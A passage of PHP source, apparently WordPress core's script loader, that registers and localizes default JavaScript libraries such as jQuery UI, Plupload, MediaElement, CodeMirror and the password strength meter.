baseURL: ' . wp_json_encode( includes_url( 'js/tinymce' ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ',
suffix: ' . ( SCRIPT_DEBUG ? '""' : '".min"' ) . ',
settings: ' . $init_obj . ',
}
}';
$wp_scripts->add_inline_script( 'wp-block-library', $script, 'before' );
}
/**
* Registers all the WordPress packages scripts.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages( $scripts ) {
wp_default_packages_vendor( $scripts );
wp_register_development_scripts( $scripts );
wp_register_tinymce_scripts( $scripts );
wp_default_packages_scripts( $scripts );
if ( did_action( 'init' ) ) {
wp_default_packages_inline_scripts( $scripts );
}
}
/**
* Returns the suffix that can be used for the scripts.
*
* There are two suffix types, the normal one and the dev suffix.
*
* @since 5.0.0
*
* @param string $type The type of suffix to retrieve.
* @return string The script suffix.
*/
function wp_scripts_get_suffix( $type = '' ) {
static $suffixes;
if ( null === $suffixes ) {
/*
* Include an unmodified $wp_version.
*
* Note: wp_get_wp_version() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* wp-includes/functions.php is not loaded.
*/
require ABSPATH . WPINC . '/version.php';
/*
* Note: str_contains() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* the polyfills from wp-includes/compat.php are not loaded.
*/
$develop_src = false !== strpos( $wp_version, '-src' );
if ( ! defined( 'SCRIPT_DEBUG' ) ) {
define( 'SCRIPT_DEBUG', $develop_src );
}
$suffix = SCRIPT_DEBUG ? '' : '.min';
$dev_suffix = $develop_src ? '' : '.min';
$suffixes = array(
'suffix' => $suffix,
'dev_suffix' => $dev_suffix,
);
}
if ( 'dev' === $type ) {
return $suffixes['dev_suffix'];
}
return $suffixes['suffix'];
}
/**
* Registers all WordPress scripts.
*
* Localizes some of them.
* args order: `$scripts->add( 'handle', 'url', 'dependencies', 'query-string', 1 );`
* when last arg === 1 queues the script for the footer
*
* @since 2.6.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_scripts( $scripts ) {
$suffix = wp_scripts_get_suffix();
$dev_suffix = wp_scripts_get_suffix( 'dev' );
$guessurl = site_url();
if ( ! $guessurl ) {
$guessed_url = true;
$guessurl = wp_guess_url();
}
$scripts->base_url = $guessurl;
$scripts->content_url = defined( 'WP_CONTENT_URL' ) ? WP_CONTENT_URL : '';
$scripts->default_version = get_bloginfo( 'version' );
$scripts->default_dirs = array( '/wp-admin/js/', '/wp-includes/js/' );
$scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" );
did_action( 'init' ) && $scripts->localize(
'utils',
'userSettings',
array(
'url' => (string) SITECOOKIEPATH,
'uid' => (string) get_current_user_id(),
'time' => (string) time(),
'secure' => (string) ( 'https' === parse_url( site_url(), PHP_URL_SCHEME ) ),
)
);
$scripts->add( 'common', "/wp-admin/js/common$suffix.js", array( 'jquery', 'hoverIntent', 'utils', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'common' );
$bulk_action_observer_ids = array(
'bulk_action' => 'action',
'changeit' => 'new_role',
);
did_action( 'init' ) && $scripts->localize(
'common',
'bulkActionObserverIds',
/**
* Filters the array of field name attributes for bulk actions.
*
* @since 6.8.1
*
* @param array $bulk_action_observer_ids {
* An array of field name attributes for bulk actions.
*
* @type string $bulk_action The bulk action field name. Default 'action'.
* @type string $changeit The new role field name. Default 'new_role'.
* }
*/
apply_filters( 'bulk_action_observer_ids', $bulk_action_observer_ids )
);
$scripts->add( 'wp-sanitize', "/wp-includes/js/wp-sanitize$suffix.js", array(), false, 1 );
$scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 );
$scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 );
did_action( 'init' ) && $scripts->localize(
'quicktags',
'quicktagsL10n',
array(
'closeAllOpenTags' => __( 'Close all open tags' ),
'closeTags' => __( 'close tags' ),
'enterURL' => __( 'Enter the URL' ),
'enterImageURL' => __( 'Enter the URL of the image' ),
'enterImageDescription' => __( 'Enter a description of the image' ),
'textdirection' => __( 'text direction' ),
'toggleTextdirection' => __( 'Toggle Editor Text Direction' ),
'dfw' => __( 'Distraction-free writing mode' ),
'strong' => __( 'Bold' ),
'strongClose' => __( 'Close bold tag' ),
'em' => __( 'Italic' ),
'emClose' => __( 'Close italic tag' ),
'link' => __( 'Insert link' ),
'blockquote' => __( 'Blockquote' ),
'blockquoteClose' => __( 'Close blockquote tag' ),
'del' => __( 'Deleted text (strikethrough)' ),
'delClose' => __( 'Close deleted text tag' ),
'ins' => __( 'Inserted text' ),
'insClose' => __( 'Close inserted text tag' ),
'image' => __( 'Insert image' ),
'ul' => __( 'Bulleted list' ),
'ulClose' => __( 'Close bulleted list tag' ),
'ol' => __( 'Numbered list' ),
'olClose' => __( 'Close numbered list tag' ),
'li' => __( 'List item' ),
'liClose' => __( 'Close list item tag' ),
'code' => __( 'Code' ),
'codeClose' => __( 'Close code tag' ),
'more' => __( 'Insert Read More tag' ),
)
);
$scripts->add( 'colorpicker', "/wp-includes/js/colorpicker$suffix.js", array( 'prototype' ), '3517m' );
$scripts->add( 'editor', "/wp-admin/js/editor$suffix.js", array( 'utils', 'jquery' ), false, 1 );
$scripts->add( 'clipboard', "/wp-includes/js/clipboard$suffix.js", array(), '2.0.11', 1 );
$scripts->add( 'wp-ajax-response', "/wp-includes/js/wp-ajax-response$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'wp-ajax-response',
'wpAjax',
array(
'noPerm' => __( 'Sorry, you are not allowed to do that.' ),
'broken' => __( 'An error occurred while processing your request. Please try again later.' ),
)
);
$scripts->add( 'wp-api-request', "/wp-includes/js/api-request$suffix.js", array( 'jquery' ), false, 1 );
// `wpApiSettings` is also used by `wp-api`, which depends on this script.
did_action( 'init' ) && $scripts->localize(
'wp-api-request',
'wpApiSettings',
array(
'root' => sanitize_url( get_rest_url() ),
'nonce' => wp_installing() ? '' : wp_create_nonce( 'wp_rest' ),
'versionString' => 'wp/v2/',
)
);
$scripts->add( 'wp-pointer', "/wp-includes/js/wp-pointer$suffix.js", array( 'jquery-ui-core' ), false, 1 );
$scripts->set_translations( 'wp-pointer' );
$scripts->add( 'autosave', "/wp-includes/js/autosave$suffix.js", array( 'heartbeat' ), false, 1 );
$scripts->add( 'heartbeat', "/wp-includes/js/heartbeat$suffix.js", array( 'jquery', 'wp-hooks' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'heartbeat',
'heartbeatSettings',
/**
* Filters the Heartbeat settings.
*
* @since 3.6.0
*
* @param array $settings Heartbeat settings array.
*/
apply_filters( 'heartbeat_settings', array() )
);
$scripts->add( 'wp-auth-check', "/wp-includes/js/wp-auth-check$suffix.js", array( 'heartbeat' ), false, 1 );
$scripts->set_translations( 'wp-auth-check' );
$scripts->add( 'wp-lists', "/wp-includes/js/wp-lists$suffix.js", array( 'wp-ajax-response', 'jquery-color' ), false, 1 );
$scripts->add( 'site-icon', '/wp-admin/js/site-icon.js', array( 'jquery' ), false, 1 );
$scripts->set_translations( 'site-icon' );
// WordPress no longer uses or bundles Prototype or script.aculo.us. These are now pulled from an external source.
$scripts->add( 'prototype', 'https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js', array(), '1.7.1' );
$scripts->add( 'scriptaculous-root', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js', array( 'prototype' ), '1.9.0' );
$scripts->add( 'scriptaculous-builder', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/builder.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-dragdrop', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/dragdrop.js', array( 'scriptaculous-builder', 'scriptaculous-effects' ), '1.9.0' );
$scripts->add( 'scriptaculous-effects', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-slider', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/slider.js', array( 'scriptaculous-effects' ), '1.9.0' );
$scripts->add( 'scriptaculous-sound', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/sound.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous-controls', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/controls.js', array( 'scriptaculous-root' ), '1.9.0' );
$scripts->add( 'scriptaculous', false, array( 'scriptaculous-dragdrop', 'scriptaculous-slider', 'scriptaculous-controls' ) );
// Not used in core, replaced by Jcrop.js.
$scripts->add( 'cropper', '/wp-includes/js/crop/cropper.js', array( 'scriptaculous-dragdrop' ) );
/*
* jQuery.
* The unminified jquery.js and jquery-migrate.js are included to facilitate debugging.
*/
$scripts->add( 'jquery', false, array( 'jquery-core', 'jquery-migrate' ), '3.7.1' );
$scripts->add( 'jquery-core', "/wp-includes/js/jquery/jquery$suffix.js", array(), '3.7.1' );
$scripts->add( 'jquery-migrate', "/wp-includes/js/jquery/jquery-migrate$suffix.js", array(), '3.4.1' );
/*
* Full jQuery UI.
* The build process in 1.12.1 has changed significantly.
* In order to keep backwards compatibility, and to keep the optimized loading,
* the source files were flattened and included with some modifications for AMD loading.
* A notable change is that 'jquery-ui-core' now contains 'jquery-ui-position' and 'jquery-ui-widget'.
*/
$scripts->add( 'jquery-ui-core', "/wp-includes/js/jquery/ui/core$suffix.js", array( 'jquery' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-core', "/wp-includes/js/jquery/ui/effect$suffix.js", array( 'jquery' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-blind', "/wp-includes/js/jquery/ui/effect-blind$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-bounce', "/wp-includes/js/jquery/ui/effect-bounce$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-clip', "/wp-includes/js/jquery/ui/effect-clip$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-drop', "/wp-includes/js/jquery/ui/effect-drop$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-explode', "/wp-includes/js/jquery/ui/effect-explode$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-fade', "/wp-includes/js/jquery/ui/effect-fade$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-fold', "/wp-includes/js/jquery/ui/effect-fold$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-highlight', "/wp-includes/js/jquery/ui/effect-highlight$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-puff', "/wp-includes/js/jquery/ui/effect-puff$suffix.js", array( 'jquery-effects-core', 'jquery-effects-scale' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-pulsate', "/wp-includes/js/jquery/ui/effect-pulsate$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-scale', "/wp-includes/js/jquery/ui/effect-scale$suffix.js", array( 'jquery-effects-core', 'jquery-effects-size' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-shake', "/wp-includes/js/jquery/ui/effect-shake$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-size', "/wp-includes/js/jquery/ui/effect-size$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-slide', "/wp-includes/js/jquery/ui/effect-slide$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-effects-transfer', "/wp-includes/js/jquery/ui/effect-transfer$suffix.js", array( 'jquery-effects-core' ), '1.13.3', 1 );
// Widgets
$scripts->add( 'jquery-ui-accordion', "/wp-includes/js/jquery/ui/accordion$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-autocomplete', "/wp-includes/js/jquery/ui/autocomplete$suffix.js", array( 'jquery-ui-menu', 'wp-a11y' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-button', "/wp-includes/js/jquery/ui/button$suffix.js", array( 'jquery-ui-core', 'jquery-ui-controlgroup', 'jquery-ui-checkboxradio' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-datepicker', "/wp-includes/js/jquery/ui/datepicker$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-dialog', "/wp-includes/js/jquery/ui/dialog$suffix.js", array( 'jquery-ui-resizable', 'jquery-ui-draggable', 'jquery-ui-button' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-menu', "/wp-includes/js/jquery/ui/menu$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-mouse', "/wp-includes/js/jquery/ui/mouse$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-progressbar', "/wp-includes/js/jquery/ui/progressbar$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-selectmenu', "/wp-includes/js/jquery/ui/selectmenu$suffix.js", array( 'jquery-ui-menu' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-slider', "/wp-includes/js/jquery/ui/slider$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-spinner', "/wp-includes/js/jquery/ui/spinner$suffix.js", array( 'jquery-ui-button' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-tabs', "/wp-includes/js/jquery/ui/tabs$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-tooltip', "/wp-includes/js/jquery/ui/tooltip$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
// New in 1.12.1
$scripts->add( 'jquery-ui-checkboxradio', "/wp-includes/js/jquery/ui/checkboxradio$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-controlgroup', "/wp-includes/js/jquery/ui/controlgroup$suffix.js", array( 'jquery-ui-core' ), '1.13.3', 1 );
// Interactions
$scripts->add( 'jquery-ui-draggable', "/wp-includes/js/jquery/ui/draggable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-droppable', "/wp-includes/js/jquery/ui/droppable$suffix.js", array( 'jquery-ui-draggable' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-resizable', "/wp-includes/js/jquery/ui/resizable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-selectable', "/wp-includes/js/jquery/ui/selectable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-sortable', "/wp-includes/js/jquery/ui/sortable$suffix.js", array( 'jquery-ui-mouse' ), '1.13.3', 1 );
/*
* As of 1.12.1 `jquery-ui-position` and `jquery-ui-widget` are part of `jquery-ui-core`.
* Listed here for back-compat.
*/
$scripts->add( 'jquery-ui-position', false, array( 'jquery-ui-core' ), '1.13.3', 1 );
$scripts->add( 'jquery-ui-widget', false, array( 'jquery-ui-core' ), '1.13.3', 1 );
// Deprecated, not used in core, most functionality is included in jQuery 1.3.
$scripts->add( 'jquery-form', "/wp-includes/js/jquery/jquery.form$suffix.js", array( 'jquery' ), '4.3.0', 1 );
// jQuery plugins.
$scripts->add( 'jquery-color', '/wp-includes/js/jquery/jquery.color.min.js', array( 'jquery' ), '3.0.0', 1 );
$scripts->add( 'schedule', '/wp-includes/js/jquery/jquery.schedule.js', array( 'jquery' ), '20m', 1 );
$scripts->add( 'jquery-query', '/wp-includes/js/jquery/jquery.query.js', array( 'jquery' ), '2.2.3', 1 );
$scripts->add( 'jquery-serialize-object', '/wp-includes/js/jquery/jquery.serialize-object.js', array( 'jquery' ), '0.2-wp', 1 );
$scripts->add( 'jquery-hotkeys', "/wp-includes/js/jquery/jquery.hotkeys$suffix.js", array( 'jquery' ), '0.0.2m', 1 );
$scripts->add( 'jquery-table-hotkeys', "/wp-includes/js/jquery/jquery.table-hotkeys$suffix.js", array( 'jquery', 'jquery-hotkeys' ), false, 1 );
$scripts->add( 'jquery-touch-punch', '/wp-includes/js/jquery/jquery.ui.touch-punch.js', array( 'jquery-ui-core', 'jquery-ui-mouse' ), '0.2.2', 1 );
// Not used any more, registered for backward compatibility.
$scripts->add( 'suggest', "/wp-includes/js/jquery/suggest$suffix.js", array( 'jquery' ), '1.1-20110113', 1 );
/*
* Masonry v2 depended on jQuery. v3 does not. The older jquery-masonry handle is a shiv.
* It sets jQuery as a dependency, as the theme may have been implicitly loading it this way.
*/
$scripts->add( 'imagesloaded', '/wp-includes/js/imagesloaded.min.js', array(), '5.0.0', 1 );
$scripts->add( 'masonry', '/wp-includes/js/masonry.min.js', array( 'imagesloaded' ), '4.2.2', 1 );
$scripts->add( 'jquery-masonry', '/wp-includes/js/jquery/jquery.masonry.min.js', array( 'jquery', 'masonry' ), '3.1.2b', 1 );
$scripts->add( 'thickbox', '/wp-includes/js/thickbox/thickbox.js', array( 'jquery' ), '3.1-20121105', 1 );
did_action( 'init' ) && $scripts->localize(
'thickbox',
'thickboxL10n',
array(
'next' => __( 'Next >' ),
'prev' => __( '< Prev' ),
'image' => __( 'Image' ),
'of' => __( 'of' ),
'close' => __( 'Close' ),
'noiframes' => __( 'This feature requires inline frames. You have iframes disabled or your browser does not support them.' ),
'loadingAnimation' => includes_url( 'js/thickbox/loadingAnimation.gif' ),
)
);
// Not used in core, replaced by imgAreaSelect.
$scripts->add( 'jcrop', '/wp-includes/js/jcrop/jquery.Jcrop.min.js', array( 'jquery' ), '0.9.15' );
// Error messages for Plupload.
$uploader_l10n = array(
'queue_limit_exceeded' => __( 'You have attempted to queue too many files.' ),
/* translators: %s: File name. */
'file_exceeds_size_limit' => __( '%s exceeds the maximum upload size for this site.' ),
'zero_byte_file' => __( 'This file is empty. Please try another.' ),
'invalid_filetype' => __( 'This file cannot be processed by the web server.' ),
'not_an_image' => __( 'This file is not an image. Please try another.' ),
'image_memory_exceeded' => __( 'Memory exceeded. Please try another smaller file.' ),
'image_dimensions_exceeded' => __( 'This is larger than the maximum size. Please try another.' ),
'default_error' => __( 'An error occurred in the upload. Please try again later.' ),
'missing_upload_url' => __( 'There was a configuration error. Please contact the server administrator.' ),
'upload_limit_exceeded' => __( 'You may only upload 1 file.' ),
'http_error' => __( 'Unexpected response from the server. The file may have been uploaded successfully. Check in the Media Library or reload the page.' ),
'http_error_image' => __( 'The server cannot process the image. This can happen if the server is busy or does not have enough resources to complete the task. Uploading a smaller image may help. Suggested maximum size is 2560 pixels.' ),
'upload_failed' => __( 'Upload failed.' ),
/* translators: 1: Opening link tag, 2: Closing link tag. */
'big_upload_failed' => __( 'Please try uploading this file with the %1$sbrowser uploader%2$s.' ),
/* translators: %s: File name. */
'big_upload_queued' => __( '%s exceeds the maximum upload size for the multi-file uploader when used in your browser.' ),
'io_error' => __( 'IO error.' ),
'security_error' => __( 'Security error.' ),
'file_cancelled' => __( 'File canceled.' ),
'upload_stopped' => __( 'Upload stopped.' ),
'dismiss' => __( 'Dismiss' ),
'crunching' => __( 'Crunching…' ),
'deleted' => __( 'moved to the Trash.' ),
/* translators: %s: File name. */
'error_uploading' => __( '“%s” has failed to upload.' ),
'unsupported_image' => __( 'This image cannot be displayed in a web browser. For best results convert it to JPEG before uploading.' ),
'noneditable_image' => __( 'The web server cannot generate responsive image sizes for this image. Convert it to JPEG or PNG before uploading.' ),
'file_url_copied' => __( 'The file URL has been copied to your clipboard' ),
);
$scripts->add( 'moxiejs', "/wp-includes/js/plupload/moxie$suffix.js", array(), '1.3.5.1' );
$scripts->add( 'plupload', "/wp-includes/js/plupload/plupload$suffix.js", array( 'moxiejs' ), '2.1.9' );
// Back compat handles:
foreach ( array( 'all', 'html5', 'flash', 'silverlight', 'html4' ) as $handle ) {
$scripts->add( "plupload-$handle", false, array( 'plupload' ), '2.1.1' );
}
$scripts->add( 'plupload-handlers', "/wp-includes/js/plupload/handlers$suffix.js", array( 'clipboard', 'jquery', 'plupload', 'underscore', 'wp-a11y', 'wp-i18n' ) );
did_action( 'init' ) && $scripts->localize( 'plupload-handlers', 'pluploadL10n', $uploader_l10n );
$scripts->add( 'wp-plupload', "/wp-includes/js/plupload/wp-plupload$suffix.js", array( 'plupload', 'jquery', 'media-models' ), false, 1 );
did_action( 'init' ) && $scripts->localize( 'wp-plupload', 'pluploadL10n', $uploader_l10n );
$scripts->add( 'comment-reply', "/wp-includes/js/comment-reply$suffix.js", array(), false, 1 );
if ( did_action( 'init' ) ) {
$scripts->add_data( 'comment-reply', 'strategy', 'async' );
$scripts->add_data( 'comment-reply', 'fetchpriority', 'low' ); // In Chrome this is automatically low due to the async strategy, but in Firefox and Safari the priority is normal/medium.
}
// Not used in core, obsolete. Registered for backward compatibility.
$scripts->add( 'json2', "/wp-includes/js/json2$suffix.js", array(), '2015-05-03' );
did_action( 'init' ) && $scripts->add_data( 'json2', 'conditional', '_required-conditional-dependency_' );
$scripts->add( 'underscore', "/wp-includes/js/underscore$dev_suffix.js", array(), '1.13.7', 1 );
$scripts->add( 'backbone', "/wp-includes/js/backbone$dev_suffix.js", array( 'underscore', 'jquery' ), '1.6.0', 1 );
$scripts->add( 'wp-util', "/wp-includes/js/wp-util$suffix.js", array( 'underscore', 'jquery' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'wp-util',
'_wpUtilSettings',
array(
'ajax' => array(
'url' => admin_url( 'admin-ajax.php', 'relative' ),
),
)
);
$scripts->add( 'wp-backbone', "/wp-includes/js/wp-backbone$suffix.js", array( 'backbone', 'wp-util' ), false, 1 );
$scripts->add( 'revisions', "/wp-admin/js/revisions$suffix.js", array( 'wp-backbone', 'jquery-ui-slider', 'hoverIntent' ), false, 1 );
$scripts->add( 'imgareaselect', "/wp-includes/js/imgareaselect/jquery.imgareaselect$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'mediaelement', false, array( 'jquery', 'mediaelement-core', 'mediaelement-migrate' ), '4.2.17', 1 );
$scripts->add( 'mediaelement-core', "/wp-includes/js/mediaelement/mediaelement-and-player$suffix.js", array(), '4.2.17', 1 );
$scripts->add( 'mediaelement-migrate', "/wp-includes/js/mediaelement/mediaelement-migrate$suffix.js", array(), false, 1 );
did_action( 'init' ) && $scripts->add_inline_script(
'mediaelement-core',
sprintf(
'var mejsL10n = %s;',
wp_json_encode(
array(
'language' => strtolower( strtok( determine_locale(), '_-' ) ),
'strings' => array(
'mejs.download-file' => __( 'Download File' ),
'mejs.install-flash' => __( 'You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https://get.adobe.com/flashplayer/' ),
'mejs.fullscreen' => __( 'Fullscreen' ),
'mejs.play' => __( 'Play' ),
'mejs.pause' => __( 'Pause' ),
'mejs.time-slider' => __( 'Time Slider' ),
'mejs.time-help-text' => __( 'Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.' ),
'mejs.live-broadcast' => __( 'Live Broadcast' ),
'mejs.volume-help-text' => __( 'Use Up/Down Arrow keys to increase or decrease volume.' ),
'mejs.unmute' => __( 'Unmute' ),
'mejs.mute' => __( 'Mute' ),
'mejs.volume-slider' => __( 'Volume Slider' ),
'mejs.video-player' => __( 'Video Player' ),
'mejs.audio-player' => __( 'Audio Player' ),
'mejs.captions-subtitles' => __( 'Captions/Subtitles' ),
'mejs.captions-chapters' => __( 'Chapters' ),
'mejs.none' => __( 'None' ),
'mejs.afrikaans' => __( 'Afrikaans' ),
'mejs.albanian' => __( 'Albanian' ),
'mejs.arabic' => __( 'Arabic' ),
'mejs.belarusian' => __( 'Belarusian' ),
'mejs.bulgarian' => __( 'Bulgarian' ),
'mejs.catalan' => __( 'Catalan' ),
'mejs.chinese' => __( 'Chinese' ),
'mejs.chinese-simplified' => __( 'Chinese (Simplified)' ),
'mejs.chinese-traditional' => __( 'Chinese (Traditional)' ),
'mejs.croatian' => __( 'Croatian' ),
'mejs.czech' => __( 'Czech' ),
'mejs.danish' => __( 'Danish' ),
'mejs.dutch' => __( 'Dutch' ),
'mejs.english' => __( 'English' ),
'mejs.estonian' => __( 'Estonian' ),
'mejs.filipino' => __( 'Filipino' ),
'mejs.finnish' => __( 'Finnish' ),
'mejs.french' => __( 'French' ),
'mejs.galician' => __( 'Galician' ),
'mejs.german' => __( 'German' ),
'mejs.greek' => __( 'Greek' ),
'mejs.haitian-creole' => __( 'Haitian Creole' ),
'mejs.hebrew' => __( 'Hebrew' ),
'mejs.hindi' => __( 'Hindi' ),
'mejs.hungarian' => __( 'Hungarian' ),
'mejs.icelandic' => __( 'Icelandic' ),
'mejs.indonesian' => __( 'Indonesian' ),
'mejs.irish' => __( 'Irish' ),
'mejs.italian' => __( 'Italian' ),
'mejs.japanese' => __( 'Japanese' ),
'mejs.korean' => __( 'Korean' ),
'mejs.latvian' => __( 'Latvian' ),
'mejs.lithuanian' => __( 'Lithuanian' ),
'mejs.macedonian' => __( 'Macedonian' ),
'mejs.malay' => __( 'Malay' ),
'mejs.maltese' => __( 'Maltese' ),
'mejs.norwegian' => __( 'Norwegian' ),
'mejs.persian' => __( 'Persian' ),
'mejs.polish' => __( 'Polish' ),
'mejs.portuguese' => __( 'Portuguese' ),
'mejs.romanian' => __( 'Romanian' ),
'mejs.russian' => __( 'Russian' ),
'mejs.serbian' => __( 'Serbian' ),
'mejs.slovak' => __( 'Slovak' ),
'mejs.slovenian' => __( 'Slovenian' ),
'mejs.spanish' => __( 'Spanish' ),
'mejs.swahili' => __( 'Swahili' ),
'mejs.swedish' => __( 'Swedish' ),
'mejs.tagalog' => __( 'Tagalog' ),
'mejs.thai' => __( 'Thai' ),
'mejs.turkish' => __( 'Turkish' ),
'mejs.ukrainian' => __( 'Ukrainian' ),
'mejs.vietnamese' => __( 'Vietnamese' ),
'mejs.welsh' => __( 'Welsh' ),
'mejs.yiddish' => __( 'Yiddish' ),
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'before'
);
$scripts->add( 'mediaelement-vimeo', '/wp-includes/js/mediaelement/renderers/vimeo.min.js', array( 'mediaelement' ), '4.2.17', 1 );
$scripts->add( 'wp-mediaelement', "/wp-includes/js/mediaelement/wp-mediaelement$suffix.js", array( 'mediaelement' ), false, 1 );
$mejs_settings = array(
'pluginPath' => includes_url( 'js/mediaelement/', 'relative' ),
'classPrefix' => 'mejs-',
'stretching' => 'responsive',
/** This filter is documented in wp-includes/media.php */
'audioShortcodeLibrary' => apply_filters( 'wp_audio_shortcode_library', 'mediaelement' ),
/** This filter is documented in wp-includes/media.php */
'videoShortcodeLibrary' => apply_filters( 'wp_video_shortcode_library', 'mediaelement' ),
);
did_action( 'init' ) && $scripts->localize(
'mediaelement',
'_wpmejsSettings',
/**
* Filters the MediaElement configuration settings.
*
* @since 4.4.0
*
* @param array $mejs_settings MediaElement settings array.
*/
apply_filters( 'mejs_settings', $mejs_settings )
);
$scripts->add( 'wp-codemirror', '/wp-includes/js/codemirror/codemirror.min.js', array(), '5.29.1-alpha-ee20357' );
$scripts->add( 'csslint', '/wp-includes/js/codemirror/csslint.js', array(), '1.0.5' );
$scripts->add( 'esprima', '/wp-includes/js/codemirror/esprima.js', array(), '4.0.0' );
$scripts->add( 'jshint', '/wp-includes/js/codemirror/fakejshint.js', array( 'esprima' ), '2.9.5' );
$scripts->add( 'jsonlint', '/wp-includes/js/codemirror/jsonlint.js', array(), '1.6.2' );
$scripts->add( 'htmlhint', '/wp-includes/js/codemirror/htmlhint.js', array(), '0.9.14-xwp' );
$scripts->add( 'htmlhint-kses', '/wp-includes/js/codemirror/htmlhint-kses.js', array( 'htmlhint' ) );
$scripts->add( 'code-editor', "/wp-admin/js/code-editor$suffix.js", array( 'jquery', 'wp-codemirror', 'underscore' ) );
$scripts->add( 'wp-theme-plugin-editor', "/wp-admin/js/theme-plugin-editor$suffix.js", array( 'common', 'wp-util', 'wp-sanitize', 'jquery', 'jquery-ui-core', 'wp-a11y', 'underscore' ), false, 1 );
$scripts->set_translations( 'wp-theme-plugin-editor' );
$scripts->add( 'wp-playlist', "/wp-includes/js/mediaelement/wp-playlist$suffix.js", array( 'wp-util', 'backbone', 'mediaelement' ), false, 1 );
$scripts->add( 'zxcvbn-async', "/wp-includes/js/zxcvbn-async$suffix.js", array(), '1.0' );
did_action( 'init' ) && $scripts->localize(
'zxcvbn-async',
'_zxcvbnSettings',
array(
'src' => empty( $guessed_url ) ? includes_url( '/js/zxcvbn.min.js' ) : $scripts->base_url . '/wp-includes/js/zxcvbn.min.js',
)
);
$scripts->add( 'password-strength-meter', "/wp-admin/js/password-strength-meter$suffix.js", array( 'jquery', 'zxcvbn-async' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'password-strength-meter',
'pwsL10n',
array(
'unknown' => _x( 'Password strength unknown', 'password strength' ),
'short' => _x( 'Very weak', 'password strength' ),
'bad' => _x( 'Weak', 'password strength' ),
'good' => _x( 'Medium', 'password strength' ),
'strong' => _x( 'Strong', 'password strength' ),
'mismatch' => _x( 'Mismatch', 'password mismatch' ),
)
);
$scripts->set_translations( 'password-strength-meter' );
$scripts->add( 'password-toggle', "/wp-admin/js/password-toggle$suffix.js", array(), false, 1 );
$scripts->set_translations( 'password-toggle' );
